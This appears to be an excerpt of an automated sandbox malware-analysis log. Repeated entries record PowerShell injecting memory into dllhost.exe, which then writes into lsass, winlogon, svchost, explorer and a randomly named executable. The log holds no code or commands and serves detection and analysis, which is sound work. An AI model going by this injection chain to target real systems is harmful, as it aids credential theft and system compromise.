Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: C33C0BB010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 263841B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
